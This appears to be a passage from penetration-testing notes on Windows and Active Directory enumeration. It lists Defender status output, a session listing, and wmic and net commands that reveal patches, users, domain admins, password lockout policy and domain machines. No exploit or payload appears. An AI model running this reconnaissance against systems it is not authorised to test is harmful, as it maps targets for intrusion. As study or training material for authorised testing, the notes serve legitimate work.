AntispywareSignatureLastUpdated  : 3/21/2022 4:06:15 AM
AntispywareSignatureVersion      : 1.361.414.0
AntivirusEnabled                 : True
AntivirusSignatureAge            : 0
AntivirusSignatureLastUpdated    : 3/21/2022 4:06:16 AM
AntivirusSignatureVersion        : 1.361.414.0
BehaviorMonitorEnabled           : True
ComputerID                       : FDA97E38-1666-4534-98D4-943A9A871482
ComputerState                    : 0
DefenderSignaturesOutOfDate      : False
DeviceControlDefaultEnforcement  : Unknown
DeviceControlPoliciesLastUpdated : 3/20/2022 9:08:34 PM
DeviceControlState               : Disable
FullScanStartTime                :
IoavProtectionEnabled            : True
IsTamperProtected                : True
IsVirtualMachine                 : False
LastFullScanSource               : 0
LastQuickScanSource              : 2

Checking Logged-in Users

PS C:\mrci0x1> qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
>console           forend                    1  Active
 rdp-tcp                                 65536  Listen

Network Enumeration

Command

Command Itself

Small Description

ARP Table

arp -a

List discovered devices in ARP cache (local LAN devices).

Network Config

ipconfig /all

Show full network adapter settings (IP, DNS, gateway).

Routing Table

route print

Show network routes (what networks are reachable).

Firewall Info

netsh advfirewall show allprofiles

Display firewall status and active firewall rules.


WMIC System Enumeration

Command

Command Itself

Small Description

Installed Patches

wmic qfe get Caption,Description,HotFixID,InstalledOn

Show installed Windows updates/patches.

System Info

wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

Display host name, domain, manufacturer, model, user info.

Running Processes

wmic process list /format:list

List all running processes.

Domain Info

wmic ntdomain list /format:list

Show domain controller and domain name info.

User Accounts

wmic useraccount list /format:list

List local and domain users who logged in.

Groups

wmic group list /format:list

List local groups on the system.

Service Accounts

wmic sysaccount list /format:list

List system/service accounts used by services.


Domain Enumeration (net Commands)

Command

Command Itself

Small Description

Local Password Policy

net accounts

Show local password and lockout policy.

Domain Password Policy

net accounts /domain

Show domain-wide password and lockout policy.

Domain Groups

net group /domain

List all domain groups.

Domain Admin Members

net group "Domain Admins" /domain

Show users in Domain Admin group.

User Info (Specific)

net user <ACCOUNT_NAME> /domain

Show info for specific domain user.

All Domain Users

net user /domain

List all users in the domain.

Domain Machines

net view /domain

List all machines joined to the domain.

Last updated